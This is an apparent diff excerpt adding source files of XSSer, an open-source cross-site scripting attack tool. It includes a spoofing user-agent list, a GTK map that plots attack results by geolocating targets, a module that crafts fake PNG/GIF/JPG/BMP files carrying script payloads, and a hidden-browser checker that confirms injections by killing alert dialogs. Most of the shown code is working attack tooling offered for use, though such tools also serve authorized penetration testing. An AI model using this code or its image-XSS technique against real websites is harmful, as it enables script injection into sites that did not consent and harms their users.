+Opera/9.25 (Windows NT 6.0; U; en)
+Privoxy/1.0
+CERN-LineMode/2.15
+cg-eye interactive
+China Local Browser 2.6
+ClariaBot/1.0
+Comos/0.9_(robot@xyleme.com)
+Crawler@alexa.com
+DonutP; Windows98SE
+Dr.Web (R) online scanner: http://online.drweb.com/
+Dragonfly File Reader
+Eurobot/1.0 (http://www.ayell.eu)
+FARK.com link verifier
+FavIconizer
+Feliz - Mixcat Crawler (+http://mixcat.com)
+TwitterBot (http://www.twitter.com)
+DataCha0s/2.0
+EvaalSE - bot@evaal.com
+Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)
+archive.org_bot
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
+Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
+Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
+Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
+Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0

File diff suppressed because it is too large
+ 1145 - 0
xsser/core/fuzzing/vectors.py


+ 616 - 0
xsser/core/globalmap.py

@@ -0,0 +1,616 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import os
+import gtk
+import user
+import gobject
+from core.reporter import XSSerReporter
+from core.curlcontrol import Curl
+from glib import markup_escape_text
+from collections import defaultdict
+from threading import Thread
+import traceback
+import urllib
+import urlparse
+import math
+import cairo
+import gzip
+import pangocairo
+import time
+
+class PointType(object):
+    checked = 15
+    success = 10
+    failed = 5
+    crawled = 0
+    crashsite = -1
+
+crash_color = [0.1,0.1,0.1]
+checked_color = [0,0.8,0.8]
+failed_color = [0.8,0.0,0.0]
+success_color = [0.0,0.0,0.8]
+crawl_color = [0.0,0.0,0.0]
+def gtkcol(col):
+    return [int(col[0]*65535),int(col[1]*65535),int(col[2]*65535)]
+
+class MapPoint(object):
+    def __init__(self, lat, lng, ptype, size, text): # 0, 5, 10, 15, 20 -> 20==checked
+        self.latitude = lat
+        self.longitude = lng
+        self.size = size
+        self.text = text
+        self.reports = defaultdict(list)
+        self.reports[ptype].append(text)
+        self.type = ptype
+        if ptype == PointType.crawled:
+            self.color = crawl_color
+        elif ptype == PointType.failed:
+            self.color = failed_color
+        elif ptype == PointType.success:
+            self.color = success_color
+        elif ptype == PointType.checked:
+            self.color = checked_color
+        else:
+            self.color = crawl_color
+        self.gtkcolor = gtkcol(self.color)
+
+    def add_reports(self, report_type, reports):
+        for report_type in set(reports.keys() + self.reports.keys()):
+            self.reports[report_type].extend(reports[report_type])
+
+class CrashSite(MapPoint):
+    def __init__(self, lat, lng, size, desturl):
+        MapPoint.__init__(self, lat, lng, PointType.crashsite, size, desturl)
+ 
+class DownloadThread(Thread):
+    def __init__(self, geomap, parent):
+        Thread.__init__(self)
+        self.daemon = True
+        self._map = geomap
+        self._parent = parent
+    def run(self):
+        geo_db_path = self._map.get_geodb_path()
+        def reportfunc(current, blocksize, filesize):
+            percent = min(float(current)/(filesize/float(blocksize)),1.0)
+            self._parent.report_state('downloading map', percent)
+        if not os.path.exists(os.path.dirname(geo_db_path)):
+            os.makedirs(os.path.dirname(geo_db_path))
+        self._parent.report_state('getting city database', 0.0)
+        try:
+            urllib.urlretrieve('http://xsser.03c8.net/map/GeoLiteCity.dat.gz',
+                           geo_db_path+'.gz', reportfunc)
+        except:
+            try:
+                urllib.urlretrieve('http://xsser.sf.net/map/GeoLiteCity.dat.gz',
+                           geo_db_path+'.gz', reportfunc)
+            except:
+                try:
+                    urllib.urlretrieve('http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz',
+                           geo_db_path+'.gz', reportfunc)
+                except:
+                    self._parent.report_state('error downloading map', 0.0)
+                    self._map.geomap_failed()
+        else:
+            self._parent.report_state('map downloaded (restart XSSer!!!!)', 0.0)
+            f_in = gzip.open(geo_db_path+'.gz', 'rb')
+            f_out = open(geo_db_path, 'wb')
+            f_out.write(f_in.read())
+            f_in.close()
+            print('deleting gzipped file')
+            os.remove(geo_db_path+'.gz')
+            self._map.geomap_ready()
+
+class GlobalMap(gtk.DrawingArea, XSSerReporter):
+    def __init__(self, parent, pixbuf, onattack=False):
+        gtk.DrawingArea.__init__(self)
+        geo_db_path = self.get_geodb_path()
+        self._parent = parent
+        self._pixbuf = pixbuf
+        self._cache_geo = {}
+        self.geo = None
+        self._onattack = onattack
+        if not os.path.exists(geo_db_path):
+            self._t = DownloadThread(self, parent)
+            self._t.start()
+        else:
+            self.finish_init()
+
+    def geomap_ready(self):
+        gtk.gdk.threads_enter()
+        gobject.timeout_add(0, self.finish_init)
+        gtk.gdk.threads_leave()
+
+    def geomap_failed(self):
+        gtk.gdk.threads_enter()
+        gobject.timeout_add(0, self.failed_init)
+        gtk.gdk.threads_leave()
+
+    def failed_init(self):
+        if hasattr(self, '_t'):
+            self._t.join()
+            delattr(self, '_t')
+
+    def finish_init(self):
+        import GeoIP
+        if hasattr(self, '_t'):
+            self._t.join()
+            delattr(self, '_t')
+        parent = self._parent
+        geo_db_path = self.get_geodb_path()
+        Geo = GeoIP.open(geo_db_path, GeoIP.GEOIP_STANDARD)
+        self.geo = Geo
+        self.set_has_tooltip(True)
+        self._max_points = 200
+        self._lasttime = 0.0
+        self.context = None
+        self.mapcontext = None
+        self._mappixbuf = None
+        self._selected = []
+        self._current_text = ["", 0.0]
+        self._stats = [0,0,0,0,0,0,0]
+        self.width = self._pixbuf.get_width()
+        self.height = self._pixbuf.get_height()
+        self._min_x = 0
+        self._max_x = self.width
+        self._drawn_points = []
+        self._lines = []
+        self._frozenlines = []
+        self._points = []
+        self._crosses = []
+        self.connect("expose_event", self.expose)
+        self.connect("query-tooltip", self.on_query_tooltip)
+        if self.window:
+            self.window.invalidate_rect(self.allocation, True)
+        if not self._onattack:
+            self.add_test_points()
+
+    def get_geodb_path(self):
+        ownpath = os.path.dirname(os.path.dirname(__file__))
+        gtkpath = os.path.join(ownpath, 'gtk')
+        if os.path.exists(os.path.join(gtkpath, 'GeoLiteCity.dat')):
+            return os.path.join(gtkpath, 'GeoLiteCity.dat')
+        else:
+            return os.path.join(user.home, '.xsser', 'GeoLiteCity.dat')
+
+    def find_points(self, x, y, distance=9.0):
+        points = []
+        self._selected = []
+        for idx, point in enumerate(self._drawn_points):
+            d_x = x-point[0]
+            d_y = y-point[1]
+            if d_y*d_y+d_x*d_x < distance:
+                self._points[point[2]].size = 4.0
+                points.append(self._points[point[2]])
+                self._selected.append(point[2])
+        if points:
+            rect = gtk.gdk.Rectangle(0,0,self.width, self.height)
+            self.window.invalidate_rect(rect, True)
+        return points
+
+    def on_query_tooltip(self, widget, x, y, keyboard_mode, tooltip):
+        if not self.geo:
+            return False
+        points = self.find_points(x, y)
+        if points:
+            text = ""
+            success = []
+            finalsuccess = []
+            failures = []
+            crawls = []
+            for point in points:
+                finalsuccess.extend(point.reports[PointType.checked])
+                success.extend(point.reports[PointType.success])
+                failures.extend(point.reports[PointType.failed])
+                crawls.extend(point.reports[PointType.crawled])
+            if finalsuccess:
+                text += "<b>browser checked sucesses:</b>\n"
+                text += "\n".join(map(lambda s: markup_escape_text(s), finalsuccess))
+                if failures or success:
+                    text += "\n"
+
+            if success:
+                text += "<b>sucesses:</b>\n"
+                text += "\n".join(map(lambda s: markup_escape_text(s), success))
+                if failures:
+                    text += "\n"
+            if failures:
+                text += "<b>failures:</b>\n"
+                text += "\n".join(map(lambda s: markup_escape_text(s), failures))
+            if crawls and not failures and not success:
+                text += "<b>crawls:</b>\n"
+                text += "\n".join(map(lambda s: markup_escape_text(s), crawls))
+
+            tooltip.set_markup(str(text))
+            return True
+        return False
+
+    def add_test_points(self):
+        self.add_point(0.0, 0.0)
+        self.add_point(0.0, 5.0)
+        self.add_point(0.0, 10.0)
+        self.add_point(0.0, 15.0)
+        self.add_point(5.0, 0.0)
+        self.add_point(10.0, 0.0)
+        self.add_point(15.0, 0.0)
+
+    def clear(self):
+        self._points = []
+        self._lines = []
+        self.mapcontext = None
+        self._frozenlines = []
+        self._crosses = []
+        self._stats = [0,0,0,0,0,0,0]
+
+    def expose(self, widget, event):
+        if not self.mapcontext:
+            self._mappixbuf = self._pixbuf.copy()
+            self.mapsurface = cairo.ImageSurface.create_for_data(self._mappixbuf.get_pixels_array(), 
+                                               cairo.FORMAT_ARGB32,
+                                               self.width,
+                                               self.height,
+                                               self._pixbuf.get_rowstride())
+            self.mapcontext = cairo.Context(self.mapsurface)
+        self.draw_frozen_lines()
+        self.context = self.window.cairo_create()
+      
+        self.context.set_source_surface(self.mapsurface)
+        self.context.rectangle(event.area.x, event.area.y,
+                              event.area.width, event.area.height)
+        self.context.clip()
+        self.context.rectangle(event.area.x, event.area.y,
+                              event.area.width, event.area.height)
+        self.context.fill()
+        self.context.set_source_color(gtk.gdk.Color(0,0,0))
+        self._min_x = 5 # we have the scale at the left for now
+        self._max_x = 0
+        if self.geo:
+            self.draw(self.context)
+        return False
+
+    def add_point(self, lng, lat, point_type=PointType.crawled, desturl="testpoint"):
+        map_point = MapPoint(lat, lng, point_type, 5.0, desturl)
+        map_point.x, map_point.y = self.plot_point(lat, lng)
+        self._points.append(map_point)
+
+    def add_cross(self, lng, lat, col=[0,0,0], desturl="testpoint"):
+        for a in self._crosses:
+            if a.latitude == lat and a.longitude == lng:
+                return
+        crash_site = CrashSite(lat, lng, 5.0, desturl)
+        crash_site.x, crash_site.y = self.plot_point(lat, lng)
+        self.adjust_bounds(crash_site.x, crash_site.y)
+        self._crosses.append(crash_site)
+        self.queue_redraw()
+
+    def insert_point(self, lng, lat, col=[0,0,0], desturl="testpoint"):
+        self._points.insert(0, MapPoint(lat, lng, point_type, 5.0, desturl))
+
+    def _preprocess_points(self):
+        newpoints = defaultdict(list)
+        for point in self._points:
+            key = (point.latitude, point.longitude)
+            newpoints[key].append(point)
+
+        self._points = []
+        for points in newpoints.itervalues():
+            win_type = points[0]
+            win_size = points[0]
+            for point in points[1:]:
+                if point.type > win_type.type:
+                    win_type = point
+                if point.size > win_type.size:
+                    win_size = point
+            self._points.append(win_type)
+            if win_type != win_size:
+                self._points.append(win_size)
+            for point in points:
+                if not point in [win_size, win_type]:
+                    win_type.add_reports(point.type, point.reports)
+        if len(self._points) > self._max_points:
+            self._points = self._points[:self._max_points]
+
+    def draw_frozen_lines(self):
+        for line in self._lines[len(self._frozenlines):]:
+            if line[4] <= 0.5:
+                self.draw_line(self.mapcontext, line)
+                self._frozenlines.append(line)
+
+    def draw(self, context, failures=True):
+        self._preprocess_points()
+        if self._lasttime == 0:
+            self._lasttime = time.time()-0.04
+        currtime = time.time()
+        timepassed = currtime - self._lasttime
+        redraw = False
+        if failures:
+            self._drawn_points = []
+            for cross in reversed(self._crosses):
+                if cross.size > 0.1:
+                    cross.size -= timepassed*2
+                else:
+                    self._crosses.remove(cross)
+                if cross.size > 0.1:
+                    redraw = True
+                self.draw_cross(cross)
+            for line in reversed(self._lines[len(self._frozenlines):]):
+                if line[4] > 0.5:
+                    line[4] -= timepassed*2
+                if line[4] > 0.5:
+                    redraw = True
+                self.draw_line(self.context, line)
+
+        for idx, point in enumerate(self._points):
+            if point.type >= PointType.success: 
+                if failures:
+                    continue
+            else:
+                if not failures:
+                    continue
+            if point.size > 1.0 and not idx in self._selected:
+                point.size -= timepassed*2
+                redraw = True
+            elif point.size < 1.0:
+                point.size = 1.0
+            self.draw_point(point)
+            x = point.x
+            y = point.y
+            self.adjust_bounds(x, y)
+            self._drawn_points.append([x, y, idx])
+        stat_f = 1.0
+        if failures:
+            mp = self._max_points
+            self.draw_bar((-45,-160,crawl_color,(self._stats[0]%mp)*stat_f))
+            self.draw_bar((-45,-155,failed_color,(self._stats[1]%mp)*stat_f))
+            self.draw_bar((-45,-150,success_color,(self._stats[2]%mp)*stat_f))
+            self.draw_bar((-45,-145,checked_color,(self._stats[3]%mp)*stat_f))
+            if int(self._stats[0] / mp):
+                self.draw_bar((-46,-160,crawl_color,-2-(self._stats[0]/mp)*stat_f))
+            if int(self._stats[1] / mp):
+                self.draw_bar((-46,-155,failed_color,-2-(self._stats[1]/mp)*stat_f))
+            if int(self._stats[2] / mp):
+                self.draw_bar((-46,-150,success_color,-2-(self._stats[2]/mp)*stat_f))
+            if int(self._stats[3] / mp):
+                self.draw_bar((-46,-145,checked_color,-2-(self._stats[3]/mp)*stat_f))
+            self.draw(context, False)
+        else:
+            if self._current_text[1] > 0.0:
+                self.draw_text(100, self.height-50, self._current_text[0])
+                self._current_text[1] -= timepassed*4
+            self._lasttime = currtime
+        if redraw:
+            self.queue_redraw()
+
+    def adjust_bounds(self, x, y):
+        if x-20 < self._min_x:
+            self._min_x = x-20
+        elif x+20 > self._max_x:
+            self._max_x = x+20
+
+    def draw_text(self, x, y, text):
+        self.context.save()
+        self.context.move_to(x, y)
+        v = (5.0-self._current_text[1])/5.0
+        self.context.scale(0.1+max(v, 1.0), 0.1+max(v, 1.0))
+        self.context.set_source_color(gtk.gdk.Color(*gtkcol((v,)*3)))
+        u = urlparse.urlparse(text)
+        self.context.show_text(u.netloc)
+        self.context.restore()
+
+    def draw_bar(self, point):
+        if point[3]:
+            self.context.save()
+            x, y = self.plot_point(point[0], point[1])
+            self.context.set_source_rgb(*point[2])
+            self.context.rectangle(x, y, 5, -(2.0+point[3]))
+            self.context.fill()
+            self.context.restore()
+            return x, y
+
+    def draw_line(self, context, line):
+        if line[4]:
+            context.save()
+            x, y = self.plot_point(line[0], line[1])
+            x2, y2 = self.plot_point(line[2], line[3])
+            self.adjust_bounds(x, y)
+            self.adjust_bounds(x2, y2)
+            context.set_line_width(1.0)
+            context.set_source_rgba(0.0, 0.0, 0.0, float(line[4])/5.0)
+            context.move_to(x, y)
+            context.rel_line_to(x2-x, y2-y)
+            context.stroke()
+            context.restore()
+
+    def draw_point(self, point):
+        if point.size:
+            self.context.save()
+            self.context.set_source_color(gtk.gdk.Color(*point.gtkcolor))
+            self.context.translate(point.x, point.y)
+            self.context.arc(0.0, 0.0, 2.4*point.size, 0, 2*math.pi)
+            self.context.close_path()
+            self.context.fill()
+            self.context.restore()
+
+    def draw_cross(self, point):
+        if point.size:
+            self.context.save()
+            self.context.translate(point.x, point.y)
+            self.context.rotate(point.size)
+            self.context.set_line_width(0.8*point.size)
+            self.context.set_source_color(gtk.gdk.Color(*point.gtkcolor))
+            self.context.move_to(-3*point.size, -3*point.size)
+            self.context.rel_line_to(6*point.size, 6*point.size)
+            self.context.stroke()
+            self.context.move_to(-3*point.size, +3*point.size)
+            self.context.rel_line_to(6*point.size, -6*point.size)
+            self.context.stroke()
+            self.context.restore()
+
+
+    def get_latlon_fromurl(self, url):
+        parsed_url = urlparse.urlparse(url)
+        split_netloc = parsed_url.netloc.split(":")
+        if len(split_netloc) == 2:
+            server_name, port = split_netloc
+        else:
+            server_name = parsed_url.netloc
+            port = None
+
+        if server_name in self._cache_geo:
+            return self._cache_geo[server_name]
+        Geodata = self.geo.record_by_name(server_name)
+        if Geodata:
+            country_name = Geodata['country_name']
+            longitude = Geodata['longitude']
+            latitude = Geodata['latitude']
+            self._cache_geo[server_name] = (latitude, longitude)
+            return latitude, longitude
+
+    def start_attack(self):
+        self.clear()
+
+    def queue_redraw(self):
+        rect = gtk.gdk.region_rectangle((self._min_x,0,self._max_x-self._min_x,
+                                  self.height))
+        if self.window:
+            self.window.invalidate_region(rect, True)
+            del rect
+
+    def mosquito_crashed(self, dest_url, reason):
+        self._current_text = [dest_url, 5.0]
+        self._stats[4] += 1
+        try:
+            lat, lon = self.get_latlon_fromurl(dest_url)
+        except:
+            return
+        self.add_cross(lon, lat, crash_color, dest_url)
+        gtk.gdk.threads_enter()
+        self.queue_redraw()
+        gtk.gdk.threads_leave()
+
+    def add_checked(self, dest_url):
+        self._current_text = [dest_url, 5.0]
+        self._stats[3] += 1
+        try:
+            lat, lon = self.get_latlon_fromurl(dest_url)
+        except:
+            return
+        self.add_point(lon, lat, PointType.checked, dest_url)
+        gtk.gdk.threads_enter()
+        self.queue_redraw()
+        gtk.gdk.threads_leave()
+
+    def add_success(self, dest_url):
+        self._current_text = [dest_url, 5.0]
+        self._stats[2] += 1
+        try:
+            lat, lon = self.get_latlon_fromurl(dest_url)
+        except:
+            return
+        self.add_point(lon, lat, PointType.success, dest_url)
+        gtk.gdk.threads_enter()
+        self.queue_redraw()
+        gtk.gdk.threads_leave()
+
+    def add_failure(self, dest_url):
+        self._current_text = [dest_url, 5.0]
+        self._stats[1] += 1
+        try:
+            lat, lon = self.get_latlon_fromurl(dest_url)
+        except:
+            return
+        self.add_point(lon, lat, PointType.failed, dest_url)
+        gtk.gdk.threads_enter()
+        self.queue_redraw()
+        gtk.gdk.threads_leave()
+
+    def add_link(self, orig_url, dest_url):
+        try:
+            lat, lon = self.get_latlon_fromurl(orig_url)
+        except:
+            return
+        try:
+            d_lat, d_lon = self.get_latlon_fromurl(dest_url)
+        except:
+            return
+        if lat == d_lat and lon == d_lon:
+            return
+        for a in self._lines:
+            if a[0] == lat and a[1] == lon and a[2] == d_lat and a[3] == d_lon:
+                return
+        self._lines.append([lat, lon, d_lat, d_lon, 0.5])
+
+    def start_crawl(self, dest_url):
+        self._current_text = [dest_url, 5.0]
+        self._stats[0] += 1
+        try:
+            lat, lon = self.get_latlon_fromurl(dest_url)
+        except:
+            return
+        self.add_point(lon, lat, PointType.crawled, dest_url)
+        gtk.gdk.threads_enter()
+        self.queue_redraw()
+        gtk.gdk.threads_leave()
+
+    def plot_point_mercator(self, lat, lng):
+        longitude_shift = -23
+        map_width = self.width
+        map_height = self.height
+        y_pos =  -1
+
+        x = int((map_width * (180.0 + lng) / 360.0) + longitude_shift) % map_width
+        lat = lat * math.pi / 180;  # convert from degrees to radians
+        y = math.log(math.tan((lat/2.0) + (math.pi/4.0)))
+        y = (map_height / 2.0) - (map_width * y / (2.0*math.pi)) + y_pos
+        return x, y
+
+    def plot_point_mercatormiller(self, lat, lng):
+        longitude_shift = 0
+        map_width = self.width
+        map_height = self.height
+        y_pos = 70
+
+        x = int((map_width * (180.0 + lng) / 360.0) + longitude_shift) % map_width
+        lat = lat * math.pi / 180.0;  # convert from degrees to radians
+        y = 1.25*math.log(math.tan((lat/2.5) + (math.pi/4.0)))
+        y = (map_height / 2.0) - (map_width * y / (2.0*math.pi)) + y_pos
+        return x, y
+
+    def plot_point_equirectangular(self, lat, lng):
+        longitude_shift = -23
+        map_width = self.width
+        map_height = self.height
+        y_pos = 0
+        magic_factor = 1.1
+        x = int((map_width * (180.0 + lng) / 360.0) + longitude_shift) % map_width
+        y = int((map_height / 2.0) - int((map_height * (lat) / 180.0)*magic_factor))
+        return x,y
+
+    def plot_point(self, lat, lng):
+        x, y = self.plot_point_equirectangular(lat, lng)
+
+        if x-20 < self._min_x:
+            self._min_x = x-20
+        if x+20 > self._max_x:
+            self._max_x = x+20
+        return x, y

File diff suppressed because it is too large
+ 1974 - 0
xsser/core/gtkcontroller.py


+ 68 - 0
xsser/core/imagexss.py

@@ -0,0 +1,68 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import os
+
+class ImageInjections(object):
+    
+    def __init__(self, payload =''):
+        self._payload = payload
+
+    def image_xss(self, filename, payload):
+        """
+        Create -fake- image with code XSS injected.
+        """
+        # check user image name input valid extensions
+        root, ext = os.path.splitext(filename)
+        
+	# create file and inject code
+        if ext.lower() in [".png", ".jpg", ".gif", ".bmp"]:
+            f = open(filename, 'wb')
+						                
+            # check user payload input
+            user_payload = payload
+            if not user_payload:
+                user_payload = "<script>alert('XSS')</script>"
+	
+            # inject each XSS specific code     
+            if ext.lower() == ".png":
+                content = '‰PNG' + user_payload
+            elif ext.lower() == ".gif":
+                content = 'GIF89a' + user_payload
+            elif ext.lower() == ".jpg":
+                content = 'ÿØÿà JFIF' + user_payload
+            elif ext.lower() == ".bmp":
+                content = 'BMFÖ' + user_payload
+
+            # write and close
+            f.write(content)
+            f.close()
+
+            image_results = "\nCode: "+ content + "\nFile: ", root + ext
+        else:
+            image_results = "\nPlease select a supported extension = .PNG, .GIF, .JPG or .BMP"
+        return image_results
+
+if __name__ == '__main__':
+    image_xss_injection = ImageInjections('')
+    print image_xss_injection.image_xss('ImageXSSpoison.png' , "<script>alert('XSS')</script>")

File diff suppressed because it is too large
+ 2694 - 0
xsser/core/main.py


+ 164 - 0
xsser/core/mozchecker.py

@@ -0,0 +1,164 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import gtk
+import sys
+import gobject
+import subprocess
+from threading import Thread
+try:
+    from gtkmozembed import MozEmbed
+except:
+    MozEmbed = None
+    import webbrowser
+
+
+class CheckerThread(Thread):
+    def __init__(self, parent, url):
+        Thread.__init__(self)
+        self.daemon = True
+        self._armed = True
+        self._url = url
+        self._parent = parent
+    def shutdown(self):
+        if self.result:
+            self._armed = False
+            self.result.terminate()
+    def run(self):
+        self.result = subprocess.Popen([sys.executable, __file__, self._url],
+                                 stderr=subprocess.PIPE)
+        self.result.wait()
+        if self._armed:
+            self._parent.on_net_stop()
+        self.result = None
+
+class MozChecker(object):
+    def __init__(self, parent):
+        self._busy = False
+        self._urlqueue = []
+        self._parent = parent
+        self._armed = True
+        if MozEmbed:
+            pass
+        else:
+            self.open = self.open_webbrowser
+
+    def remaining(self):
+        return len(self._urlqueue)
+
+    def init_mozembed(self):
+        self.moz = MozEmbed()
+        self.moz.connect('net-stop', self.on_net_stop)
+        self.moz.connect('net-state', self.on_net_state)
+        self.moz.connect('new-window', self.on_new_window)
+        self.add(self.moz)
+        self.moz.show()
+
+    def on_new_window(self, widget, retval, chromemask):
+        print("new window")
+        print(widget, retval, chromemask)
+        return False
+
+    def open_webbrowser(self, url):
+        webbrowser.open(url, 2, False)
+
+    def open_job(self, url):
+        if self._parent:
+            self._parent.start_token_check(url)
+        self._busy = CheckerThread(self, url)
+        self._busy.start()
+
+    def shutdown(self):
+        if self._busy:
+            self._armed = False
+            self._busy.shutdown()
+            self._busy.join()
+
+    def open(self, url):
+        if not self._busy:
+            self.open_job(url)
+        else:
+            self._urlqueue.append(url)
+
+    def on_js_status(self, widget):
+        widget.get_js_status()
+
+    def on_net_state(self, widget, flags, status):
+        print("net_state", widget, flags, status)
+
+    def on_net_stop(self, widget=None):
+        gtk.gdk.threads_enter()
+        gobject.timeout_add(0, self.process_next)
+        gtk.gdk.threads_leave()
+
+    def process_next(self):
+        if self._urlqueue and self._armed:
+            next_url = self._urlqueue.pop(0)
+            self.open_job(next_url)
+        else:
+            self._busy = False
+
+if __name__ == '__main__':
+    win = gtk.Window()
+    def finished(widget):
+        gtk.main_quit()
+
+    def alertkill():
+        for a in gtk.window_list_toplevels():
+            if a.get_title() and (a.get_title() == 'Alert' or 'says' in a.get_title() or 'Warning' in a.get_title()):
+                print(a.get_children())
+                a.hide()
+                a.destroy()
+                gtk.main_quit()
+        gobject.timeout_add(100, alertkill)
+
+    def bailout():
+        gtk.main_quit()
+        sys.exit()
+
+    def unmap(widget):
+        widget.hide()
+
+    def new_window(widget, retval, mask):
+        print("new window!!")
+
+    gobject.timeout_add(30000, bailout)
+    gobject.timeout_add(100, alertkill)
+
+    win = gtk.Window()
+    win.set_property('skip-taskbar-hint', True)
+    win.set_property('skip-pager-hint', True)
+    win.set_keep_below(True)
+    win.connect('map', unmap)
+
+    moz = MozEmbed()
+    moz.load_url(sys.argv[1])
+
+    moz.connect('net-stop', finished)
+    moz.connect('new-window', new_window)
+
+    win.set_title(sys.argv[1])
+
+    win.add(moz)
+    win.show_all()
+    gtk.main()

+ 207 - 0
xsser/core/options.py

@@ -0,0 +1,207 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, https://xsser.03c8.net
+
+Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import optparse
+import core.fuzzing.vectors
+import core.fuzzing.DCP
+import core.fuzzing.DOM
+import core.fuzzing.HTTPsr
+
+class XSSerOptions(optparse.OptionParser):
